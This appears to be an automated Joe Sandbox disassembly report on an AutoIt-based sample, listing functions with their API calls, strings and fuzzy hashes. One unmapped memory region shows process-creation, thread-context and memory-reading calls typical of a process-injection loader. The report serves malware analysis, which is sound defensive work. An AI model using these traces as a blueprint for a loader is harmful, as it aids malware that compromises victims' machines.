Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d3827e859e692b3d8b4bd43ff7036839c9363679b05a72e840e74c0340b91f23
Instruction ID: 41ffde6368847b10818c59de2353a23765a4ee7481e4221dd2529340b7b80e24
Opcode Fuzzy Hash: d3827e859e692b3d8b4bd43ff7036839c9363679b05a72e840e74c0340b91f23
Instruction Fuzzy Hash: C321B4B1E01618AFDB00DFE4E889ADDBBF8FB08701F10412BF911E62A0DBB145559F91

Function 00A1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AD52F8,?,00A137AE,?), ref: 00A14724

Part of subcall function 00A3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A17165), ref: 00A3052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A171A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A4E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A4E909
RegCloseKey.ADVAPI32(?), ref: 00A4E947
_wcscat.LIBCMT ref: 00A4E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 00A1719E
\Include\, xrefs: 00A17165
\, xrefs: 00A4E9C3
Include, xrefs: 00A4E8BF, 00A4E900

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 26c608441ed90b7cf9592d3d9e858b5860932376c3baaaaf801a9cd3e896f713
Instruction ID: f73baab91a6483718dc2f1dc1a0d6c3d034abce1b5db1b507e5057701be50da4
Opcode Fuzzy Hash: 26c608441ed90b7cf9592d3d9e858b5860932376c3baaaaf801a9cd3e896f713
Instruction Fuzzy Hash: 89714C719093019EC704EFA5E9819EBBBF8FF85350F40092FF446871A1EB719949CB92

Function 00A13A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A13A50
LoadCursorW.USER32(00000000,00007F00), ref: 00A13A5F
LoadIconW.USER32(00000063), ref: 00A13A76
LoadIconW.USER32(000000A4), ref: 00A13A88
LoadIconW.USER32(000000A2), ref: 00A13A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A13AC0
RegisterClassExW.USER32(?), ref: 00A13B16

Part of subcall function 00A13041: GetSysColorBrush.USER32(0000000F), ref: 00A13074
Part of subcall function 00A13041: RegisterClassExW.USER32(00000030), ref: 00A1309E
Part of subcall function 00A13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
Part of subcall function 00A13041: InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
Part of subcall function 00A13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
Part of subcall function 00A13041: LoadIconW.USER32(000000A9), ref: 00A130F2
Part of subcall function 00A13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101

Strings

#, xrefs: 00A13AFB
0, xrefs: 00A13AF4
AutoIt v3, xrefs: 00A13B05

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 96db6f1024914b44a9147414d83de271e485cb0836ca45b71c0a3f7b4662cdfa
Instruction ID: 989300c30815616a0b0ff5af356387daa5d13cfc91507d69c8894820ad69f240
Opcode Fuzzy Hash: 96db6f1024914b44a9147414d83de271e485cb0836ca45b71c0a3f7b4662cdfa
Instruction Fuzzy Hash: 6F2128B1E02304AFEB10DFF4EC09BED7BB0EB08712F10012AE505A62A1D7B556568F84

Function 00A13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A136D2
KillTimer.USER32(?,00000001), ref: 00A136FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A1371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A1372A
CreatePopupMenu.USER32 ref: 00A1373E
PostQuitMessage.USER32(00000000), ref: 00A1374D

Strings

TaskbarCreated, xrefs: 00A13725

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 78ecc5031645c9e587ad5a9ca8cd68b129fbbecaf09f8fff13f390234fdd2aa4
Instruction ID: 5e0fd72db7d481167312f650eeafc7d681e6794c22d5dbd0cf9849a03c79939f
Opcode Fuzzy Hash: 78ecc5031645c9e587ad5a9ca8cd68b129fbbecaf09f8fff13f390234fdd2aa4
Instruction Fuzzy Hash: F24107B7604545BBDF24DFB8ED09BFE37A4EB44301F140126F603D62E1EA609E86A761

Function 00A13766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINE, xrefs: 00A13822
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00A137AE
/ErrorStdOut, xrefs: 00A1387D
CMDLINERAW, xrefs: 00A137FB
/AutoIt3OutputDebug, xrefs: 00A13892
/AutoIt3ExecuteLine, xrefs: 00A138A7
/AutoIt3ExecuteScript, xrefs: 00A138BC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 3b0c66bd102b3b2d94d51f0dd402337b06b59e7f651b855b624522fff8b5a714
Instruction ID: 15a998037f4010e637aae58e3e1544f650e68182f51dee6592d1567d7b3eeb5c
Opcode Fuzzy Hash: 3b0c66bd102b3b2d94d51f0dd402337b06b59e7f651b855b624522fff8b5a714
Instruction Fuzzy Hash: A1A14B76D0021DAACF04EFE4DD91AEEBBB8BF14350F44042AF416A7191EF745A89CB60

Function 0114B520 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0114B5F1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0114B817

Memory Dump Source

Source File: 00000000.00000002.1333407734.0000000001148000.00000040.00000020.00020000.00000000.sdmp, Offset: 01148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1148000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 553ec803633862290f98b66d1e371a022471c0a17b39dae47c7628bbac846fb8
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 1DA13A74E04209EBDB18CFA4C894BEEBBB5FF48705F248559E201BB280D7759A41CF99

Function 00A139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A13A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13A24
ShowWindow.USER32(00000000,?,?), ref: 00A13A38
ShowWindow.USER32(00000000,?,?), ref: 00A13A41

Strings

edit, xrefs: 00A13A1E
AutoIt v3, xrefs: 00A139FB, 00A13A00, 00A13A01

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: cecee0523fbd2cca4c3ce74ed5395aba3606276c2ad7a0995fd39c0adb17271c
Instruction ID: cb384e569d2e2501d4ff81ae1102abae429e530af1bca027848d31e3f12ce3b3
Opcode Fuzzy Hash: cecee0523fbd2cca4c3ce74ed5395aba3606276c2ad7a0995fd39c0adb17271c
Instruction Fuzzy Hash: 83F03A70A022907EEA3097A36C48EAB3F7DE7C6F50B00002BB901E2170C6614806CAB0

Function 0114B2E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0114B1D0: Sleep.KERNELBASE(000001F4), ref: 0114B1E1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0114B40D

Strings

RGUCIGSR28PGZYMFE5T, xrefs: 0114B470, 0114B473

Memory Dump Source

Source File: 00000000.00000002.1333407734.0000000001148000.00000040.00000020.00020000.00000000.sdmp, Offset: 01148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1148000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateFileSleep
String ID: RGUCIGSR28PGZYMFE5T
API String ID: 2694422964-3201386630
Opcode ID: a2f97b37ef08c34864fdb424f3efda9f42dd7dcd60ca4f5d8e3497f3eeeabe39
Instruction ID: 8de285a1789eab05d05ae2070ae31b331115339cc274d0a2bd30a642e8941a35
Opcode Fuzzy Hash: a2f97b37ef08c34864fdb424f3efda9f42dd7dcd60ca4f5d8e3497f3eeeabe39
Instruction Fuzzy Hash: 2E51A130D0824CDBEF15DBA4C814BEEBBB5AF14704F044199E209BB2C1D7B95B04CBA6

Function 00A1407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A4D3D7

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

_memset.LIBCMT ref: 00A140FC
_wcscpy.LIBCMT ref: 00A14150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A14160

Strings

Line: , xrefs: 00A4D400

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: f0e456f09d9cef4fc8c232fc4717011e854d04a10ea3c0aa5ccf884ac205be13
Instruction ID: 623f3db40a6230f042a308ac85e50aaac738f5630665961cac25b55d76620897
Opcode Fuzzy Hash: f0e456f09d9cef4fc8c232fc4717011e854d04a10ea3c0aa5ccf884ac205be13
Instruction Fuzzy Hash: 3931AF71409704AFD321EBA4DD46FDF77E8AF48310F10491BF586920A1EB74A689CB92

Function 00A1686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F

_free.LIBCMT ref: 00A4E263
_free.LIBCMT ref: 00A4E2AA

Part of subcall function 00A16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A16BAD

Strings

Bad directive syntax error, xrefs: 00A4E292
>>>AUTOIT SCRIPT<<<, xrefs: 00A4E039

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 57a53ff94e6fed5f14dc47223203507260922ede5639b677e25a26f2a33718a2
Instruction ID: d982926d2dfeef3a269722650dba1d0e7ca7c44c6f2575a3045302abf9488c70
Opcode Fuzzy Hash: 57a53ff94e6fed5f14dc47223203507260922ede5639b677e25a26f2a33718a2
Instruction Fuzzy Hash: 8B918D75A00219EFCF04EFA4DD919EDB7B8FF58310F14852AF816AB2A1DB70A945CB50

Function 00A135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A135A1,SwapMouseButtons,00000004,?), ref: 00A135D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A135A1,SwapMouseButtons,00000004,?,?,?,?,00A12754), ref: 00A135F5
RegCloseKey.KERNELBASE(00000000,?,?,00A135A1,SwapMouseButtons,00000004,?,?,?,?,00A12754), ref: 00A13617

Strings

Control Panel\Mouse, xrefs: 00A135D2

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: d69b477eac98b26963b1d5d65b7beebf252f91fedf23efd5700d9a1edeb57cea
Instruction ID: 35eb89f472438c99f2c22e519120358cddf28210af1b0ad43578865ad380d720
Opcode Fuzzy Hash: d69b477eac98b26963b1d5d65b7beebf252f91fedf23efd5700d9a1edeb57cea
Instruction Fuzzy Hash: 33114872610208BFDF20CFA4DC809EFB7BCEF44740F00846AE805D7210E6719E959760

Function 0114A1D0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0114A98B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0114AA21
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0114AA43

Memory Dump Source

Source File: 00000000.00000002.1333407734.0000000001148000.00000040.00000020.00020000.00000000.sdmp, Offset: 01148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1148000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction ID: ae62db683429989bed9532effa32a197d978f3631d396636c6ead78d139a3c8e
Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction Fuzzy Hash: BA623E30A54258DBEB28CFA4D840BDEB376EF58700F1091A9D10DEB390E7769E81CB59

Function 00A7955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00A14EE5: _fseek.LIBCMT ref: 00A14EFD

Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79824
Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79837

_free.LIBCMT ref: 00A796A2
_free.LIBCMT ref: 00A796A9
_free.LIBCMT ref: 00A79714

Part of subcall function 00A32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00A39A24), ref: 00A32D69
Part of subcall function 00A32D55: GetLastError.KERNEL32(00000000,?,00A39A24), ref: 00A32D7B

_free.LIBCMT ref: 00A7971C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction ID: e97c04e5ed2953790662e8d0fe52fbfc4a746f94e2054b1a3ecbbab49a4896bf
Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction Fuzzy Hash: 93514DB5D04258AFDF249F64CC85A9EBBB9EF48300F10449EF60DA7241DB715A81CF58

Function 00A3470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A347A0
__flush.LIBCMT ref: 00A347C0
__write.LIBCMT ref: 00A347F3
__flsbuf.LIBCMT ref: 00A34821

Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: d47a6f89a3114f5b9205431722e68f01bdc4b9908b9e3863208ab738da1c4c0e
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 0141C375A007469BDB28CF69D9819AE7BB5EF4A360F24817DF815C7640DB70FD418B40

Function 00A144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A144CF

Part of subcall function 00A1407C: _memset.LIBCMT ref: 00A140FC
Part of subcall function 00A1407C: _wcscpy.LIBCMT ref: 00A14150
Part of subcall function 00A1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A14160

KillTimer.USER32(?,00000001,?,?), ref: 00A14524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A14533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A4D4B9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: d6b3c7c3544fe6856abbf28f03bebe000ceea1420fb128753140c98287c1fa89
Instruction ID: 608d60a995641b6a51df89953345d54271d6b71da93b1ec724cd682584562a2a
Opcode Fuzzy Hash: d6b3c7c3544fe6856abbf28f03bebe000ceea1420fb128753140c98287c1fa89
Instruction Fuzzy Hash: 39210474904784AFE732CB688849BE6BBECAF45314F04009EE68E9A281C7742EC5CB41

Function 00A17285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A4EA39
GetOpenFileNameW.COMDLG32(?), ref: 00A4EA83

Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770

Part of subcall function 00A30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A307B0

Strings

X, xrefs: 00A4EA51

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
